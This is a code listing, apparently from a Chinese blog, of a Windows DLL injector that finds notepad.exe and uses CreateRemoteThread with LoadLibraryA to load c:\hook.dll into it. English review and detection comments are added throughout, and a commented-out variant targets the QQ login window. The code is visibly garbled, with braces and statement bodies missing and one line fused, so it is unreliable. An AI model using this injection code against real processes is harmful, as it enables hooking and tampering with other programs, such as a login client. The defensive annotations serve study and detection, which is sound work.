DLL注入的常用方式之一远程线程注入,实现代码如下
CreateRemoteThread注入DLL // CreateRemoteThread.cpp : Defines the entry point for the application.
CreateRemoteThread注入DLL //
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL #include "stdafx.h"
CreateRemoteThread注入DLL #include <stdio.h>
CreateRemoteThread注入DLL #include <tlhelp32.h>
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL #pragma comment(lib,"th32.lib")
CreateRemoteThread注入DLL
/*
 * Walks a Toolhelp32 process snapshot and returns the PID of the first entry
 * whose image name matches the hard-coded targetFile ("notepad.exe").
 * Returns (DWORD)-1 when nothing matches; WinMain compares against -1.
 *
 * Listing note: this copy of the source lost several brace lines and the
 * statements that followed the second strstr() test (they appear as blank
 * lines below), so the exact loop body cannot be recovered from here.
 *
 * Defender note: process-name lookup via CreateToolhelp32Snapshot /
 * Process32First / Process32Next is the target-selection step of this sample;
 * the only selector is the image name, and the PID found here is what
 * WinMain later opens with PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
 * PROCESS_VM_WRITE.
 */
CreateRemoteThread注入DLL DWORD GetProcessId()
CreateRemoteThread注入DLL {
// Target image name. It is the *haystack* of the strstr() calls below.
CreateRemoteThread注入DLL char* targetFile = "notepad.exe";
// Sentinel: -1 becomes 0xFFFFFFFF in a DWORD; the caller's `== -1` test
// relies on the same conversion.
CreateRemoteThread注入DLL DWORD Pid=-1;
// Snapshot of all processes. NOTE(review): the handle is never compared
// against INVALID_HANDLE_VALUE and there is no CloseHandle(hSnap) anywhere in
// this function, so the snapshot handle leaks on every call.
CreateRemoteThread注入DLL HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
CreateRemoteThread注入DLL PROCESSENTRY32 lPrs;
CreateRemoteThread注入DLL ZeroMemory(&lPrs,sizeof(lPrs));
// dwSize must be set before Process32First/Next will accept the structure.
CreateRemoteThread注入DLL lPrs.dwSize=sizeof(lPrs);
CreateRemoteThread注入DLL Process32First(hSnap,&lPrs);// fetch the first process entry from the system snapshot (return value unchecked)
// strstr(haystack=targetFile, needle=szExeFile): true when the snapshot
// entry's name occurs *inside* "notepad.exe". This is a substring test, not
// an exact or case-insensitive comparison, so an entry whose name is a
// substring of the target also matches.
CreateRemoteThread注入DLL if(strstr(targetFile,lPrs.szExeFile))
CreateRemoteThread注入DLL {
CreateRemoteThread注入DLL Pid=lPrs.th32ProcessID;
// Early return skips the loop below (and, like every path here, leaks hSnap).
CreateRemoteThread注入DLL return Pid;
CreateRemoteThread注入DLL }
CreateRemoteThread注入DLL
// Listing note: the opening brace of this loop is missing in this copy.
CreateRemoteThread注入DLL while(1)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
// Garbled in this copy: as written this is a comma expression that assigns
// sizeof(lPrs) to dwSize. Presumably a ZeroMemory(&lPrs, ...) call was fused
// with the dwSize reset during extraction -- TODO confirm against the original.
CreateRemoteThread注入DLL lPrs.dwSize=(&lPrs,sizeof(lPrs));
// End of snapshot (or error): reset the sentinel and leave the loop. The
// opening brace of this if-body is missing in this copy.
CreateRemoteThread注入DLL if(!Process32Next(hSnap,&lPrs))
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL Pid=-1;
CreateRemoteThread注入DLL break;
CreateRemoteThread注入DLL }
// Same substring test as above. The body of this if (presumably assigning
// Pid and breaking) and the loop's closing brace are lost in this copy --
// TODO confirm against the original.
CreateRemoteThread注入DLL if(strstr(targetFile,lPrs.szExeFile))
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
// Closing brace of the function is also missing in this copy.
CreateRemoteThread注入DLL return Pid;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
/*
 * Enables one privilege on the current process token.
 * Despite the function name, the privilege looked up below is
 * SE_SHUTDOWN_NAME. Returns false only when OpenProcessToken fails; the
 * GetLastError() branch near the end has lost its body in this copy, so what
 * it returned cannot be confirmed from here.
 *
 * Listing note: the braces after the signature, around the GetLastError()
 * branch and at the end of the function are missing in this copy.
 *
 * Defender note: adjusting token privileges immediately before opening
 * another process is a common precursor in injector samples; enabling a
 * privilege is audited under the "Audit Token Right Adjusted" subcategory
 * (event 4703) when that policy is on.
 */
CreateRemoteThread注入DLL BOOL EnabledDebugPrivilege()
CreateRemoteThread注入DLL
// Neither variable is initialised; tkp is only partially filled in below and
// hToken is never closed (no CloseHandle(hToken) in this function).
CreateRemoteThread注入DLL HANDLE hToken;
CreateRemoteThread注入DLL TOKEN_PRIVILEGES tkp;
CreateRemoteThread注入DLL
// Open our own token with the rights needed to read and change privileges.
CreateRemoteThread注入DLL if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
CreateRemoteThread注入DLL return false;
CreateRemoteThread注入DLL
// Resolve the LUID for SE_SHUTDOWN_NAME (not a debug privilege). The return
// value is unchecked; on failure the LUID in tkp stays indeterminate.
CreateRemoteThread注入DLL LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL tkp.PrivilegeCount = 1;
CreateRemoteThread注入DLL tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
CreateRemoteThread注入DLL
// Return value ignored; the code instead consults GetLastError() below, which
// is how a partial success (ERROR_NOT_ALL_ASSIGNED) is reported by this API.
CreateRemoteThread注入DLL AdjustTokenPrivileges(hToken,false,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
CreateRemoteThread注入DLL
// Body of this branch lost in this copy (presumably `return false;`) --
// TODO confirm against the original.
CreateRemoteThread注入DLL if (GetLastError() != ERROR_SUCCESS)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL return true;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
/*
 * Entry point of the sample injector.
 * Sequence: enable a token privilege, find the target PID by image name,
 * allocate a buffer in the target, copy the DLL path into it, and start a
 * remote thread at kernel32!LoadLibraryA with that buffer as its argument so
 * the target's own loader maps c:\hook.dll.
 *
 * Defender note: the visible call chain - OpenProcess(PROCESS_CREATE_THREAD |
 * PROCESS_VM_OPERATION | PROCESS_VM_WRITE) -> VirtualAllocEx ->
 * WriteProcessMemory -> CreateRemoteThread(LoadLibraryA, <remote path>) - is
 * the textbook remote-thread injection pattern. Host telemetry that records
 * cross-process handle opens with these rights, cross-process memory writes,
 * and threads created in one process by another with a start address inside
 * kernel32!LoadLibraryA, followed by an image load in the target, observes
 * every step of it.
 *
 * Listing note: the brace after the signature and the braces around the four
 * error branches are missing in this copy; except for the "dw not found"
 * branch, whether a failure branch returns or falls through cannot be
 * determined from here.
 */
CreateRemoteThread注入DLL int APIENTRY WinMain(HINSTANCE hInstance,
CreateRemoteThread注入DLL HINSTANCE hPrevInstance,
CreateRemoteThread注入DLL LPSTR lpCmdLine,
CreateRemoteThread注入DLL int nCmdShow)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL // TODO: Place code here.
// Return value ignored: injection proceeds even if the token adjustment failed.
CreateRemoteThread注入DLL EnabledDebugPrivilege();
CreateRemoteThread注入DLL
// Hard-coded DLL path. Only this string crosses into the target; the DLL
// itself is read from disk by the target's loader.
CreateRemoteThread注入DLL char* dllName = "c:\\hook.dll";
CreateRemoteThread注入DLL //HMODULE hDll = LoadLibrary(dllName);
CreateRemoteThread注入DLL
// LoadLibraryA is resolved in *this* process and the address is reused as the
// remote thread's start address, i.e. the code assumes kernel32.dll is mapped
// at the same base in the target. Both GetModuleHandle and GetProcAddress
// results are unchecked.
CreateRemoteThread注入DLL FARPROC farLoadLibrary = GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA");
CreateRemoteThread注入DLL DWORD dwProcessID = GetProcessId();
CreateRemoteThread注入DLL
// Opening brace of this branch is missing in this copy.
CreateRemoteThread注入DLL if(dwProcessID == -1)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"dw not found","",0);
CreateRemoteThread注入DLL return 0;
CreateRemoteThread注入DLL
// Commented-out alternative target selection by window title, kept as in the
// original.
CreateRemoteThread注入DLL //HWND hwNotePad = FindWindow(NULL,"QQ用户登录");
CreateRemoteThread注入DLL //if(hwNotePad == NULL)
CreateRemoteThread注入DLL //return 0;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL //GetWindowThreadProcessId(hwNotePad, &dwProcessID);
// NOTE(review): formats the PID for display but the buffer is never used
// afterwards and never delete[]ed. 10 bytes is also one short of the worst
// case "0x" + 8 hex digits + NUL (11 bytes), so a large PID overflows it.
CreateRemoteThread注入DLL char* pid = new char[10];
CreateRemoteThread注入DLL sprintf(pid,"0x%x",dwProcessID);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
// Access rights requested on the target: create a thread, reserve/commit
// memory, and write to it.
CreateRemoteThread注入DLL HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwProcessID);
// NOTE(review): OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE,
// so this test never fires and a failed open is not detected here. The
// branch's braces are missing in this copy; no return is visible after the
// CloseHandle.
CreateRemoteThread注入DLL if(hProcess == INVALID_HANDLE_VALUE)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"open error","",0);
CreateRemoteThread注入DLL CloseHandle(hProcess);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
// Remote buffer for the path string. The size is strlen(dllName), which does
// not count the terminating NUL; the same size is used for the write below.
CreateRemoteThread注入DLL LPVOID lpDllAddr = VirtualAllocEx(hProcess, NULL, strlen(dllName), MEM_COMMIT, PAGE_READWRITE);
// Braces of this branch are missing in this copy; what follows the
// MessageBox cannot be recovered from here.
CreateRemoteThread注入DLL if(lpDllAddr == NULL)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"alloc error","",0);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
// Cross-process write of the path (again without the NUL). Braces of the
// error branch are missing in this copy.
CreateRemoteThread注入DLL if(!WriteProcessMemory(hProcess, lpDllAddr, dllName, strlen(dllName) ,NULL))
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"Write error","",0);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
// Remote thread: start address = locally resolved LoadLibraryA, parameter =
// the remote path buffer. The handle is closed immediately without waiting,
// and without checking for NULL, so the result of the load is never observed.
CreateRemoteThread注入DLL HANDLE hT = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)farLoadLibrary, lpDllAddr, 0, NULL);
CreateRemoteThread注入DLL CloseHandle(hT);
CreateRemoteThread注入DLL CloseHandle(hProcess);
CreateRemoteThread注入DLL MessageBox(NULL,"finish","",0);
// Closing brace of WinMain is missing in this copy.
CreateRemoteThread注入DLL return 0;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL